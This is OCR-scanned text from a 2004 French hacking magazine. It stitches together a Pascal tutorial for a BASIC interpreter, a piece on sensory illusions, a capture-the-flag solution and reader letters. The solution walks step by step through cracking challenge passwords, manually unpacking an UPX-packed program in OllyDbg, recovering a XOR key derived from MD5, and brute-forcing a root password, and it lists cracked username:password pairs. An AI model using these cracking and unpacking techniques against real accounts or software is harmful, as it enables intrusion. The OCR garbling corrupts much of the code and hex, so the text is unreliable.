Si l'on veut accéder aux compo- Unop : 
sants d’une expression, il nous faut Bin0p : 
envisager tous les cas de figure possi- End 
bles. Par exemple, il faut imaginer une 
fonction d’accès à l’argument d’une 
expression unaire et deux fonctions 
d'accès aux arguments d’une expres- 
sion binaire, 


Function apof (e : 


Case expCasenf(e) of 


Les fonctions prioritaires 
à implémenter dans NGBASIC 


End ; 


Function arg0f (e : exp) : exp ; 


Function arg10f (e : 

Begin 
arglof : 

End ; 


exp) + exp à 


e.argl ; 


Function arg20f (e : exp) : exp ; 
Begin 

arg£of : 
End ; 


-arg2 ; 


Les instructions 


NGBasic se compusera de centaines 
d'instructions afin de fournir, sans 
noyer l'utilisateur sous un flot d'infor- 
mations complexes, l'outil de dévelop- 
pement le plus complet possible. 

Cependant, pour faire simple dans 
un premier temps, nous allons définir 
une liste d'instructions de base que 
nous allons développer en priorité (voir 
Tableau). 


exp) + exp0p ; 


€“ opl ; 
e*.0p2 


Mais attention, pour utiliser une 


sémantique 


affectation : la variable Ident recoit la Valeur de 
l'expression expr 


fonction d'accès, il faut tout d’abord | |?Yntèxe 
définir quelle catégorie d'expression | | Ifent= expr 
est concernée, C’est le but de la fonc- 

GOTOnUM 


tion expCaseof. 


saut inconditionnel : l'exécution se poursuit à la ligne 
numéro num 


Function expCaseDf (e : exp) : expCase ; 


IFexpr G0TO num 


saut conditionnel : si la valeur de l'expression exprest 
TRUE, alors l'exécution se poursuit à la ligne numéro 
num, sinon elle se poursuit à la ligne suivante 


entrée : la variable fdent reçoit la valeur lue au clavier 


sortie : affiche à l'écran la valeur d'expr 


sortie : affiche à l'écran la chaine de caractères string 


sortie : passe à la ligne suivante de l'écran 


Begin 
expCaseof := e*.flag ; 
Fes INPUTident 
Functi of ( ei PRINTexpr 
Ft nameOf (e : exp) : String ; PRINT ste: 
nameOf := €.nane ; PRINTLH 
End ; END 


errêt : termine l'exécution 


Function valOf Le : exp) : value ; 


On utilise des enregistrements à 
champ variant pour définir le type des 
instructions. On se donnera, dans la 
syntaxe abstraite, une seule instruc- 
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ti 


1 


CPCNG 


tion de sortie dont l'argument sera une 
expression, une chaîne de caractères 
ou un saut de ligne. 


Types 
AnstType = (STO, JMP, COMP, IN, OÙT, EXIT) 3 
outType = (OutString, OutExp, OutLn) : 
outContent = 


Procedure addLine(n : 
Begin 


Men et qui, par la même occasion, met 
à jour la valeur progLen. 


Integer; x : inst) ; 


ï += progLen ; 
While (1 > 1) and (praghen[i].num > n) do À 
LE proghent i1.num = n then proghenC{]. inst 


fl: 
x 


Record 
Case outcase : outiype of 
OutString : ( S : String ) 3 


OutExp tCetemp): 
Outln Qi 
End 
End ; 
inst = 
Record 


Case instCase : instype of 


STO : ( stoNamel : String; stoExp : exp ) ; 


JP: C ämpline : Intecer ) ; 
CMP : Ç cnpExp : exp ; cimpLine 
IN + Ç inNane : String ) ; 
OUT: C outArg : outContent ) ; 
ENT : © 
En 
End ; 


Attention, ici il n’y a pas de cons- 
tructeur d'instruction car une instruc- 
tion est représentée par un 
enregistrement et pas un pointeur sur 
enregistrement, Par contre, par la suite, 
il faudra penser à définir une procé- 
dure d’initialisation d'instruction, 


À la découverte de la notion 
de programme... 


Qu'est-ce qu'un programme ? C’est 
une suite de lignes débutant par un 
numéro et contenant des instructions. 
Cette suite de lignes est représentée 
par un tableau dont la taille est limi- 
tée par une constante, MAXPROGLEN, 


Le programme en lui-même est 
contenu dans une variable, dite globa- 
le, proghem. 


Une autre variable, elle aussi glo- 
bale, progLen, contient l'indice de la 
dernière instruction du programme, 


Enfin, par le booléen err__Dutot- 
ProgMemnous disposons d’un indicateur 
de débordement de la mémoire 
allouée aux programmes. 


Else Begin 


If not err 
IF prog! 
progLen 
For js 


+ Integer ) 3; 


Const MAXPROGLEN ; 


Types 
progLine = 
Record 
num : Integer ; 
Tinelnst : inst 
End ; 


progeb = array [1..MAPROGLEN] of progLine ; 


Var 
proghen + progTab ; 
progLen : Integer ; 
err_OutofFrogMem : Booleën ; 


Notez que nous faisons Fhypothè- 
se que les lignes d’un programme sont 
rangées consécutivement, c'est-à-dire 
qu’il n’y a pas de trous dans le tableau 
progMen, On commence par l'indice 1 
et ensuite Pordre des numéros va crois- 
sant, Donc nous pouvons en déduire 
que progLen correspond à la fois au 
dernier indice de ligne d'un program- 
me et à la longueur du programme 
(son nombre de lignes). 

Cette hypothèse de travail doit être 
maintenue et c’est le but d’une procé- 
dure qui insère correctement les 
nouvelles lignes dans le tableau prog- 
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err_OutOfProgMem := (progLen < MAXPROGLEN) ; 


_OutOfProgMem then Begin 
MenCi].num < n then À : 
progLenkt 
ragLen dounto (1-1) 


Nous noterons quand mème que si 
Je tableau est plein, un appel à addLine 
ne change rien au tableau mais 
positionne l'indicateur d'erreur 
err_DutofProghem à la valeur TRUE ; si 
le numéro de ligne à rajou- 
ter (n) est déjà présent dans 
la table, l'ancienne instruc- 
tion est remplacée par la 
nouvelle (x). 

Mais la procédure d'inser- 
tion des lignes dans un pro- 
gramme peut faire apparaître 
un problème de cohérence 
entre le numéro de ligne 
(champ num des enregistre 
ments de type progline) et 
l'indice de l'instruction asso- 
ciée dans le tableau. 

Si l’on ne veut pas avoir 
à rechercher la correspon- 
dance entre un numéro de ligne et un 
indice du tableau lors de l'exécution 
des instructions de saut, il faut réajus- 
ter les arguments de ces instructions 
avant de lancer l'exécution du pro- 
gramme. 


Conclusion 


Voici quelques bases pour le futur 
NGBasic mais ce n'est que le début du 
travail et un long chemin reste à par- 
courir. Nous entrerons un peu plus 
dans les détails de notre interpréteur 
dès le prochain numéro. 
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AO UO ES TEA CAEN S 
"PARA 


ACLÈCES 


En stimulant artificiellement les capteurs sen- 
soriels des muscles on crèe des illusions de 
gmouvement des membres ou du corps entier. 
L'existence de ces illusions démontre que les 
6 ee musculaires sont une source priori- 
ire de pose perception des positions et des 


D 
me x 


On peut ainsi donner à un 
sujet l'illusion qu’il dessine 
différentes formes géomé- 
triques alors que sa main reste 
immobile. Les sujets recon- 
naissent et nomment sans dif- 
ficulté les formes qu’ils ont 
l'illusion de dessiner. Des cel- 
lules situées dans les aires 
corticales pariétales posté- 
rieures codent les caractéris- 
tiques cinématiques du mou- 
vement sous forme vectorielle 
dont l’origine est l’extrèmité 
de la main. 

En faisant vibrer le biceps de 
sujets aux yeux bandés aux- 
quels on avait demandé de se 
ipincer le nez entre le pouce et 
l'index ‘on leur a donné l’illu- 
sion que leur nez s'allongeait, 
jusqu'à atteindre, chez cer- 
ains d’entre eux une trentaine 
de centimètres. 


111 ne semble donc pas extravagant de penser 
que dans un avenir proche, un voyage phy- 
äsique dans un univers purement numérique à 
l’aide de programmes de stimulation cérebro- 
sensorielle sera possible, le corps étant totale- 
ment immergé au cœur du son et de l’image. 
Sources : Emma Young, New Scientist. 
ené Cuillierier, Jean Pierre Roll, Dossiers 
our la Science n° 39 : Les illusions des sens. 
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___ The Hackademy challenge 2004 


The Hackademy 
004 


BY KES 


challenge 2 


Solution de 
l'épreuve newbie Il 
par reverse 
engineering 


L'essence du hacking consiste 
souvent à prendre des chemins 
qui n'étaient pas prévus au 
départ. Bravo à Kes qui a eu 
l'audace de prendre le challenge 
newbie No 2 à rebours, et avec 
succès ! Cette solution explique, 
pas à pas, comment il a déjoué 
les pièges que comportait cette 
approche. 
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Solution "classique" 


Ce challenge avait pour but de démontrer qu'il est facile de cracker 
des mots de passe dont on connaît la forme, ou dérivés d'informa- 
tions personnelles, Nous voulions aussi montrer qu'il est dangereux 
d'utiliser un mot de passe plusieurs fois, L'épreuve était partagée 
en deux parties. 
Cracking offline 
L'archive à télécharger comportait divers fichiers, dont un fichier 
passwords (de type Unix), une base de données des personnes, une 
clé gpg, un fichier crypté avec épg et un fichier john.pot, Le fichier 
john.pot comportait des mots de passes invalides, mais qui don- 
naient au moins un exemplaire dé chaque type de mot de passe uti- 
lisé dans la vraie liste (nom, nom d'utilisateur, adresse, date de 
naissance, mots usuels, etc.). 
En s'aidant de ces informations, on pouvait oracker presque tous 
les comptes du fichier password (sauf quelques-uns, inutiles). L'un 
des mots de passe (celui de zlggy, aka Roul Morille) permettait de 
débloquer la clé gpg. : 
Cracking online 
Avec la clé, on pouvait extraire un exécutable du fichier crypté. Ce 
programme, VirtualPC.exe, ouvre lé port 9000 en local, et invite à 
entrer un login et mot de passe, un peu comme telnet. Pour ceux 
qui veulent suivre les indications de Kes, Vous pouvez le télécharger 
directement depuis notre site, 
En utilisant les comptes crackés précédemment, on obtenait divers 
indices pour la suite. Un des comptes donnait cependant une sorte 
de shell, Seules les commandes su et exit fonctionnaient. 11 fallait 
ensuite trouver le mot de passe root, à passer à su, pour terminer 
l'épreuve. 
Comme expliqué dans le Manuel 8, on pouvait utiliser le logiciel 
Brutus pour réaliser une attaque par dictionnaire. Les indices 
permettaient de mieux cibler la liste : le mot est tré d'une langue 
des balkans (on trouve une wordlist croate sur packetstorm). Il fallait 
aussi rajouter Un chiffre (pat exemple en utilisant les règles de 
transformation de John the Ripper), et éliminer les mots de passe 
de plus de 6 signes. Et voilà. 
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En préambule je dirais que j'ai 
choisi d'approcher cette épreuve par 
le reverse engineering, car je n'arrivais 
pas à cracker le passe root du fichier 
shad.bak. Les indications me laissaient 
supposer qu'il s'agissait de program- 
mer John the Ripper pour parvenir à 
ce résultat. Il s'agissait en fait de faire 
autre chose, mais je ne l'avais pas com- 
pris. Bref, après une semaine de brute 
force infructueuse, j'ai décidé de rever- 
ser le programme. 


Unpacking du logiciel 


J'ai tout d'abord commencé par 
désassembler le programme afin de 
voir si, par le plus pur des hasards, je 
ne trouvais pas l'une où l'autre des 
string refs utiles pour trouver le 
message de réussite du challenge. Mal- 
heureusement, une telle approche n'a 
pas fonctionné. Dans ce cas de figure, 
je cherche à voir si le programme n'est 
pas packé. Je prends donc peid (une 
application pour détecter les packers), 
qui me renvoie le résultat suivant : 
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Mar- 
kus & Laszlo 

Bon upx, pas de problème, c'est 
assez classique pour packer. Je télé 
charge done upx et j'essaie d'un packer. 
Cela ne fonctionne pas. J'essaye ensui- 
te Unpack (une application qui détecte 
les packers et contient un set d'unpac- 
kers). J'obtiens un exécutable, mais il 
s'avère inutilisable. 

J'avoue ne pas être très doué pour 
unpacker les programmes, Donc je 
demande à une personne qui s'y connaît 
mieux que moi, et elooo m'explique 
comment faire pour unpacker le 
programme manuellement (encore 
merci a toi !), 

On se sert d’OllyDbg et on trouve 
un entry point en 1230. À cet offset on 
met ebfe (qui boucle dans le vide ; et 
on note sur un papier les octets origi- 
naux), On fait tourner le programme 
en boucle et on le dump avec lordpe. 
On modifie l'entry point, toujours avec 
lordpe, on remplace le flag d'upx0 par 
€00000e0, et on met la BaseofCode à 
1000 (1000 correspond à l'offset 
d'UPX0). On sauve, et avec un éditeur 
hexadécimal on restaure les bytes 
modifiés ci avant. 
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Ensuite, on se sert d'imprec pour 
reconstruire les imports (c'est-à-dire : 
lancer le programme packé, le charger 
dans imprec, mettre le bon dep >> iat 
autosearch). Il est nécessaire de jouer 
avec les valeurs du RVA et de size pour 
avoir les 5 imports du programme (en 
jouant avec ces valeurs, on voit qu'il y 
à 5 imports valides). Puis on joue enco- 
re avec ces valeurs en donnant à RVA 
l'adresse du premier import valide, et 
à size une taille suffisante pour recou- 
vrir les 5 imports, mais avant d'arriver 
à un import non valide. 

Ensuite : on fait "fix dump" sur le 
programme dumpé, et là, on a un exé- 
cutable fonctionnel. 


Exploiter les informations 


Je me sers maintenant du pro- 
gramme unpacké. En cherchant les 
string references avec windasm, on 
n'obtient pas les chaînes affichées, ce 
qui signifie qu'il va falloir faire autre- 
ment pour comprendre ce que le pro- 
gramme fait. 

Avec OllyDbsg, j'essaye d'abord de 
comprendre ce que fait Le programme 
en prenant le taureau par les cornes. 
Cela s'avère être une mauvaise appro- 
che. Bon, je passe sur ce que j'ai fait, 
mais en gros je plantais le programme. 

Donc je fouille la mémoire et 
remarque que certaines données sont 
placées dans la mémoire les unes à la 
suite des autres, séparées par des nops 
(90 en hexadécimal). 

Ça commence comme ça : 


DD4B18DA C3 90 96 99 99 99 98 99 9ÿ 98 
60481814 99 99 90 99 99 98 42 69 65 GE 


(J'obtiens ce résultat en me calant 
à 40180a et avec un clic droit, puis "fol. 
low in dump".) 

Ensuite, en descendant, on a visible- 
ment des commandes. En descendant 
davantage, ça recommence (bienv 
sur le système etc.). 

On descend encore (le message de 
bravo de la première partie). On des- 
cend une nouvelle fois : des comman- 
des, puis oh ! Du texte disposé comme 
du texte clair dans la mémoire, sauf 
qu'il ne veut 
rien dire ! 
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Donc je place un breakpoint à 
40140, juste après le nop (breakpoint 
on memory access, sinon Olly n'aime 
pas et affiche un message pour indi- 
quer un problème). Ensuite on s'assu- 
re que le programme est lancé (sinon 
on appuie sur F9). Là, il faut voir que 
notre breakpoint ne fonctionnera qu'a 
deux conditions suivantes : 
— on à bien affaire à une section du 
message crypté, 
— on entre le passe qui correspond au 
bon message. 
Ressortons donc notre liste de mots 
de passe valides dans virtualPC. Voici 
la mienne : 


ta6r: 
jgrimaud:0range 
Jbouder:petey 
repcheri :131187 
fturc:85170 
iménceau: Snowbal 
dierat:3944 
rrivenai 160386 
oualry 
kjoussos :20123 
npapion:2691 
ddebinde 
egortais 
rdeTahat :9256 
choussay :9506 
idrouet :gordon 
dbedouet :12061984 
gnéour:191070 
grobard:23/03/77 
cfloch:87/12/74 
mgautier :26/48/84 
| grenaud:28/07/87 


99 98 94 99 99 9ÿ À 
76 65 6E 75 65 20 Bienvenue 


En téstant Lous ces passes, on $ 
perçoit qu'avec egortais comme utili- 
sateur et 05071977 comme passe, 
OlyDbg bloque ! Et on atterit en 
00402504, sait ici : 


PMbagesos |. 8881 1MOV BVTE PTR DS:[FCXI,AL 


On appuie sur F8 plusieurs fois 
pour tracer et on s'aperçoit que l'on 
est dans une boucle. On va pouvoir 
comprendre ce qui se passe. Juste 
avant on a : 


| appears |. oFBGAQ EGeAag>IMOVZX EAX,BYTE PTR DS: LEAX-4988E0] 


&e 


nanaennmeeænn 


n OHeawmean ment eme 


ses 
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Dans la petite fenêtre, on 


clique sur DS et "follow adress in 


dump". On constate qu'il y a la 
chaîne de caractères suivante : 


DO4BSED 48 ES 2E FC 13 U1 81 BC 


Encore une fois F8, et on 
revient sur notre xor entre le 
mov et le movz d'avant . Il sem- 
blerait que nos valeurs soient 
xorées ; après 16 caractères 
xorés, on s'aperçoit que l'on 
revient en début de chaîne. Ça y 
est, on a le cryptage : du xor et 
rien d'autre, avec une clé de 16 
caractères. En effet, en se calant 
sur le mov à 00402504 et en cli- 
quant sur ds/"follow adress in 
dump", on s'aperçoit que le mes- 
sage se déchiffre petit à petit. 


La génération de la chaîne 
de décryptage 


Bon, une chaîne de 16 carac- 
tères, ça me rappelle le md5. 
C'est donc une hypothèse, mais 
ie ne sais pas pour autant ce qui 
est hashé. Tiens, j'ai un utilisa- 
teur qui ne demande pas de 
passe, c'est t00r. Voyons voir ce 
qui se passe avec celui-là. 

On fait un clic droit sur la 
table et remove memory break- 
point. On relance le programme 
en appuyant sur F9. Et on reste 
près de l'adresse 402502, car 
nous allons placer un breakpoint 
dessus par la suite. Donc, une 
fois le programme reparti, on y 
met notre breakpoint. 

On se reconnecte et on rent- 
re t00r comme username et rien 
comme passe. Olly bloque le pro- 
gramme, en faisant comme tout 
à l'heure. En suivant l'adresse 
dans le dump, on constate que la 
chaïne de 16 caractères est cette 
fois : 


F498EC2634C259A0959C183RB8B4E458 


Bien, imaginons que c'est du 
md5. Que ce passe-t-il si je tente 
de cracker cette chaîne avec 
mdcrack ? 1] suffit d'essayer. 


4cD4 
347F 
28F1 
23E3 
AFE6 
32F3 
66F3 
29E2 
2AF9 
6FB8 


EF BA 33 2C 88 30 46 1E 


Collision found | = tapr 


Voilà, en fait la chaîne de l'u- 
sername est juste hashée en 
md5. Mais que se passe-t- 
il pour le passe ? Bon, en 
essayant, on s'aperçoit 
que celui-ci est juste concaténé 
avec le nom d'utilisateur et 
hashé. 


Une fausse piste 


Par acquis de conscience et 
pour être sur d'avoir tous les 
indices, je me suis ensuite amusé 
à cracker toutes les chaînes cryp- 
tées en mémoire. Si l'on compa- 
re la taille des chaines cryptées 
avec la taille de la clé, on s'a- 
perçoit que les programmes de 
cracking de xor ne donnent pas 
un résultat idéal, 

Mais à la main, cela reste fai- 
sable si l'on observe par ailleurs 
que la plupart des messages de 
dyrasp finissent par un point et 
un retour chariot (soit 2e0a en 
hexadécimal), plus le fait qu'ils 
commencent par des majuscules 
la plupart du temps. Toujours 
est-il que l'on s'aperçoit vite que 
les messages cryptés finissent 
souvent par 00 (en hexadécimal) 
comme séparateur, voire 90. J'ai 
trouvé la chaîne suivante en 
mémoire : 


3516 43F9 3469 2528 7F7C 
3858 20D3 9374 5426 6039 
6255 2006 1E3C 513F 2C2C 
T95E 2096 123C 7128 2C2E 
3544 3081 4270 GUGA 7F25 
TSF 289F AC79 6B20 6979 
7B59 2890 143C 662F 2C31 
6556 3A80 Z53C 2026 697C 
7044 3003 476E 6A25 7878 


2170 A83B 
964€ 8010 
1610 9911 
9810 8815 
1053 8011 
5369 8B54 
1010 9A1B 
5369 9B54 
1454 9954 
7937 


Vu la taille de celle-ci, elle doit 
être considérée 
comme facile à 
cracker comparée 
aux autres. Ontrouve comme 
chaîne de décryptage : 
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challenge 2004 


Elle donne le message de fin 
de challenge que l'on devrait 
obtenir en rentrant le bon passe. 
Prenez un cracker xor de base 
pour obtenir ce résultat, avec 
comme caractère le plus fré- 
quent 20 (en hexadécimal), soit 
l'équivalent de la touche espace, 
De toute manière, vous devrez 
finir à la main, 

Reste à savoir ce qui se passe 
quand on essaye de se loguer en 
root. Tout d'abord, assurez-vous 
que la fenêtre en bas à gauche 
de Olly soit calée sur 4088e0 (en 
théorie, si vous n'avez rien fermé 
et suivi mes instructions, vous 
devriez y être). Ensuite on va 
poser un breakpoint en écriture 
sur cette zone de la mémoire (les 
16 actets). Vous pouvez ôter, si 
vous le voulez, le breakpoint sur 
le xor placé précédemment, ça 
ira plus vite pour continuer. 

Reconnectez-vous sur le port 
8000 en localhost, Une fois que 
le programme est en mode run- 
ning (voir en bas à droite), 
connectez-vous avec le login : 
grobard et le mot de passe : 
23/03/77 . 

OllyDbg bloque : tapez plu- 
sieurs fois sur F9 jusqu'à ce que 
le programme soit reparti, Et 
taper "su". Rentrez un mot de 
passe au hasard, comme "test" 
par exemple. 

Le programme bloque et plus 
haut on voit la chaîne suivante : 


90498800. testrrnr 
AGAUBEAG  vrreerrrrererrer 
2B4080BE rrrerrrrrer 


C'est-à-dire le mot de passe 
que l'on a rentré, concaténé avec 
une chaîne-de 31 fois r. On 
appuie plusieurs fois sur run et 
on voit le hash se former. La 
chaîne obtenue est la suivante : 


55 84 2A 46 87 F8 70 BD 7A 41 D4 D9 13 12 61 D4 


C'est-à-dire à l'endroit où l'on 
a la chaîne de décryptage. En 
vérifiant, on s'aperçoit que cette 
chaîne correspond non pas au 
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hash du mot de passe root rentré, 
mais à celle du pass root rentré 
concaténé des 31 r (note : j'ai 
vérifié pour d'autres longueurs 
de passe afin d'être sûr que ce 
soit ça), Je modifie donc une 
version de kmd5 1.02 (pas la der- 
nière version), un cracker mds 
maison - certes plutôt mal codé 
mais plutôt rapide pour les listes 
comparé à d'autres - afin de 
concaténer à chaque fois 31 r à 
la fin du mot. Et je vérifie que le 
cracker est fonctionnel en testant | 
sur des mots de passe choisis, 

Et là je suis une fausse piste 
: je pars du principe que c'est le 
hash root (cracké plus haut) qui 
va me servir au décryptage 
(c'était pourtant logique). Je pro- 
fite donc, en crackant en md5, du 
bénéfice d'une vitesse d'attaque 
supérieure à John the Ripper. 
Là, je peux tenter des attaques 
qu'il me semblait déraisonnable 
de faire avant, à cause du temps 
qu'elles prendraient, Pour ce 
faire, je rentre dans ma liste de 
hkash à cracker : 


46967330FE74153740F2691C54AGCEC 

et | 

96733DFE74153749F3691CDS4ADCSCAG | 
| 


Soit le même que plus haut, 
mais avec une rotation des 
chiffres en hexadécimal, car le 
premier caractère du message 
décrypté n'était pas une lettre 
mais OA (donc, par acquis de 
conscience je mets les deux, ce 
qui est de toute façon presque 
aussi rapide). Je n'obtiens aucun 
résultat. 


La vraie piste 


Faute de résultat, je me rap- 
pelle du message de drasp sur 
Je forum, qui indiquait que dans 
certains cas on obtenait des mes- 
sages bizarres et qu'il ne fallait 
pas en tenir compte, Comme je 
commençais à maudire dvrasp, je 
me suis dit que là encore je 
n'allais pas suivre son conseil :e 
Il m'est donc venu à l'esprit de 
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voir comment faisait Le program- 
me pour me dire si le login est 
correct ou non, Par chance, il est 
facile de voir la zone de mémoi- 
re qui sert à indiquer que le 
passe n'est pas correct. 


Là, on voit une jolie compa- 
raison entre DL=7A et CL=55. 
55 correspond à notre pre- 
mier chiffre de la hash. Appuyez 
à nouveau 4 fois sur run (ou F9). 
On retombe au même 


C'est ici : endroit. Et à ce niveau-là on 

peut voir 

DH491549 [> C74424 DA B614>HOV DNORD PTR SS:CESP#41,DECRYPT 994814; | d'où venait 
ASCII "Hot de passe incorrect." ce7A: 


On constate aussi qu'il y a un 
jump qui appelle cette chaîne : 
Q84815IA 78 20 

Avec une comparaison juste 
avant. 

On ôte le breakpoint qu'on 
avait mis avant dans la mémoire 
à 4088E0, tout en sachant qu'il 
nous sera utile plus tard. Donc, 
clic droit sur la zone en bas> | 
breakpoint > remove memory | 
breakpoint. Et nous allons rajou- 
ter un breakpoint juste avant la 
zone de comparaison décrite ci- 
dessus. Disons ici, au début de la 
chaîne d'instruction : 


GRAOLAFE |> 8845 CA 

On appuie sur F9, et comme 
il est inutile de chercher à se 
reloguer, on tape su puis à nou- 
veau un passe comme "test". 
OlyDbg se bloque au break- 
point. On va donc replacer un 
breakpoint en access memory 
sur les deux octets à 4088e0 et 
4080De1 (je n'en prends que deux 
car sinon il va bloquer plus de 
fois pour rien). Pour cela : sélec- 
tionner les deux bytes en ques- 
tion et faire comme tout à 
l'heure, avec un breakpoint on 
memory access. 

Appuyer 4 fois sur F9 jusqu'à 
tomber sur : 
78091499 BB4E FC 

Ce qui est intéressant vient | 
ensuite (appuyez sur F8 pour y 
arriver) : 


7806140F 3801 CP CL,DL 
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7899140 


JS SHORT DECRYPT_.20491549 | 


MOV ECX,DNORD PTR DS:CESI 


8857 FC 


MOV EAX,DMORD PTR SS:[EBP-3C] 


MOY EDX,DNORD PTR DS:CEDI-4] 


Dans la fenêtre du milieu, on 
voit écrit : 


DS: [49496894 T=TBADCLCF 


Faites un clic droit dessus et 
“follow adress in dump". Vous 
tombez sur SF C1 AD 7B etc. 

Appuyez une fois sur F8 et 
vous voyez que notre 55 de notre 
hash est cette fois comparé avec 
le 9F d'avant. Appuyez 4 fois sur 
F9 et deux fois sur F8. 

Tiens, DL est cette fois de 1f, 
c'est le caractère qui est à 4 
cases plus loin. Recommencez 
l'opération. Oh | Encore 4 
cases plus loin : la chaîne 
suivante est AO 77 3F 27. 
Que se passe-t-il si je la modifie 
par les quatre premiers chiffres 
de la chaîne md5 du passe que 
j'ai rentré ? Bon, souvenez-vous, 
si on rentre le passe root "test", 
on obtient comme 4 premier 
chiffres : 


56 54 2A 46 


Donc on sélectionne la zone 
de mémoire : 


AG 77 3F 27 


Clic droit > binary > edit et 
écrivez où collez à la place : 


4] | 55 B4 2A 46 


Puis appuyez sur Ok. 

Faites ensuite un clic droit 
sur la même zone Breakpoint > 
remove memory breakpoint et 
appuyez sur F9. On obtient une 
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chaîne bizarre dans notre client tel- 
net : ça y est, j'ai enfin le truc dont 
dvrasp ne veut pas que je ne tienne 
pas compte ! On touche le bon bout ! 

On a des séries de 4 chiffres hexa- 
décimales qui servent à être compa- 
rées au hash, Les voici toutes : 


TASC7BAS JFCIAD7E 1F2AFSF 7B94F2AA 
55842446 QDADRSBF ABSFBFCS GAGEGACA 
D336268C 86842643 GACB367D 1836C1F4 
9C7EDGA 82C323FE 9E127A87 FC7BFBDS 
82396093 39917924 85815C25 E73C3867 
09901790 C1AA429E 83454542 FAADEB9A 
2D81EA16 19F14E7D COAGAFC7 FEACEEBG 
F498EC26 BA63G5DS 


C'estä-dire que si mes hashs md5 
commencent par l'une de ces séquen- 
ces, j'ai peut-être un bon mot de passe. 
Reste à ressortir notre cracker qui 
concatène les chaînes avec des r et à 
le modifier une nouvelle fois, afin qu'il 
ne compare que les 4 premiers octets, 

Bon, un octet peut contenir 256 
chiffres différents (de 00 à FF), soit 
256 possibilités. Et 256 à la puissance 
4, c'est 4 milliards environ. On aura 
donc un passe en moyenne tous les 


140 millions environ, pour 30 débuts | Épilogue 


de hashs, ce qui devrait limiter le nom- 
bre de faux positifs. Ensuite, il faut 
calibrer l'attaque. 

En fait, on peut se contenter de 
faire une attaque alphanumérique avec 
un seul chiffre (indiqué comme indice) 
et avec comme taille maximale 6 signes 
(indiquée dans les indices aussi). Le 
cracker donne quelques faux positifs, 
comme biggql7 et sos8zs. Mais au final, 
on trouve 2kurac comme mot de passe. 


Ça ne correspond pas au passe root | 


du fichier shad.bak, puisque j'avais 
testé ce type d'attaque avec John the 
Ripper. (Mine de rien, on teste 
712882560 possibilités si j'ai bien cal- 
culé.) Et donc là je comprends ce que 
j'aurais dû faire au départ avec ce pro- 


gramme : un script qui fait une attaque | 


par force brute sur le port 9000 de 
localhost, avec probablement un liste 
de mots venant de l'un ou l'autre pays 
des Balkans (comme la Croatie 
puisque "kurac" fait partie de la liste 
de mot de ce pays, comme aurait pu le 
deviner facilement tout habitué de 
cette page web : hitp://mwrinsutmonger.som/ 
swearing/ercatian. tm). 


Classements du Challenge 


Pour ceux qui sont curieux, le hash 
trouvé est : 


ba6395d5e6b2Da66e253574c8f673520 pour 
2kuracrrrcrrrererrerierennnnerree 


Et celui-ci ne correspond pas du 
tout au passe de décryptage xor du 
fichier crypté. Un breakpoint en écri- 
ture sur la zone qui contient le passe, 
soit à 4088E0, permet de démontrer 
que c'est bien la clé : 


46967330FE 741537497260 1C054AUCEC 


qui est utilisée comme trouvé pré- 
cédemment pour decrypter en xor, 
mais qui n'est calculée que plus tard, 


Remerciements : 

loco pour m'avoir aidé à unpacker le 
programme, 

dgsse pour m'avoir supporté durant le 
challenge :» 

Les outils utilisés sont répertoriés sur le 
site suivant : 


ttp://protools anticrack de/ 


Classement sur la deuxième épreuve Newbie seulement : 


$ (Le premier à valider 
6 les deux parties était ZirKKam, 
4 suivi de Steve0S). 


C'est donc SteveOS qui gagne Un abonnement à TH. Il recevra 
également un tshirt ! spécial édition Qualified ”, tout comme Kes 
et Mariomomo (ZirKKam, ganjalink et lancaster étant les vain- 


PROCHAINES ÉPREUVES DÈS LE 15 MAI 2004 
wwvw.thehackademy.net/challenge/index.php 


Expert : 
dvorak 10 Expert 
Spacewalker 9 Expert | 
sauron 8 Expert 1 
Ict de Expert I, Newbie Ila Steve0S 8 
mendragore 7 Expert 1 ZirkKam 
sebasto 7 Expert |, Newbie Ila&b Kes 
phun 6 Expert 1, Newbie 1 ganjalink 
lojav 5 Expert | lancaster. 4 
DeLeTe 2 Newbie Il Mariomomo ci 
zoul23 2 
Newbie : SE À 
yozam 2 
Zikkam 11 Newbie, Newbie lla&o Jitfax 2 
ganialink 8 Newbie l, Newbie la&io 
Steve0S 8 Newbie Ila&b 
kKes # Newbie |, Newbie lla&b | 
lancaster Fi Newbie |, Newbie Ila&b 
zoul23 4 Newbie |, Newbie lla&b | queurs de l'épreuve précédente). 
yozam K] Newbie |, Newbie Ila&b | 
Sebux 3 Newbie |, Newbie Ila 
Mariomomo 3 Newbie |la&b 
jiffax 2 Newbie |la&b 


MAI-JUIN 2004 


63 


voice@dmpfrance.com 


Voix de la communaute 


Hacking et sites pédophiles 


Bonjour, je lis vos magazines et me suis dit que vous pourrez sûrement détecter les créateurs des sites pédophiles suivants. Étant contre ce style de pra- 
tique, je me dit que vous ferez sûrement mieux que les files qui sont 24 h sur 24 h à l'apero. 


narfounet 


Merci pour ton Initiative. Cependant, ce n'est pas le rôle de The Hackademy de courir après ces criminels, même si nous condam- 
nons ces gens tout aussi vivement que tol. Ce genre d'Interférence est d'allleurs connu pour gêner, voire ruiner complètement des 
enquêtes on cours. 

Si tu ne fais pas conflance à la police, tu peux contacter des associations qui connaissent bien mieux le problème que nous, et qui 
peuvent efflcacement coordonner nos efforts. Par exemple bouclier.org. 


Open Proxy 


Merci pour ce journal avec Loutes ces infos. J'ai un petit souci avec le honeypot du n° 13. Je suis pas très fort en python, et je voulais savoir si y avait 
moyen de changer quelquechose dens le code pour pouvoir se connecter sur un server ire assez sécurisé. Car en fait, quand je larice le honeypot puis me 
connecte sur lrc.freenode.net, il me refuse car |! dis que je suis un "open proxy ". 


lafourmi 
Il faut ajouter une entrée dans la liste suivante : 


if peerhost in L'Java.ca.us.webchat.org', 
'AReins-195-2-1-21.w217-128.abo.wanadoo.fr', 
‘bax.shellserv.net']: 
%og.nsg("(*) Blocking proxy scanner (IRC) %s' # peerhost) 
Tog.nsg("code #s connection to %s:%s (user #s) refused' # (code, server ,port ,user)) 
return & 


Tu trouveras dans tes logs le nom de l'host correspondant à ce serveur irc. 


Cracker une boîte mail 


Comert hacker une boîte mail ? Par exemple la mienne. Je veux dire : comment peut-on trouver le "pass ! d'une boîte mall si on a uniquement son adres- 
se mal ? 

J'ai déjà lu beaucoup de conneries du genre : mettez vos emails et votie pass dans ls body du mail lol 1 

Quelle amaque. Voilà, c'est juste pour savoir si vous savez comment faire. 


Merd 
Leonardo 
Il y a différentes techniques qui peuvent répondre à ta question, en fonction du type de boîte mall considéré. Cela dit, je ne peux pas 


te donner des informations techniques précises permettant de pirater une boîte donnée, pour des raisons légales. 
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Voix de la communauté 


RE + 
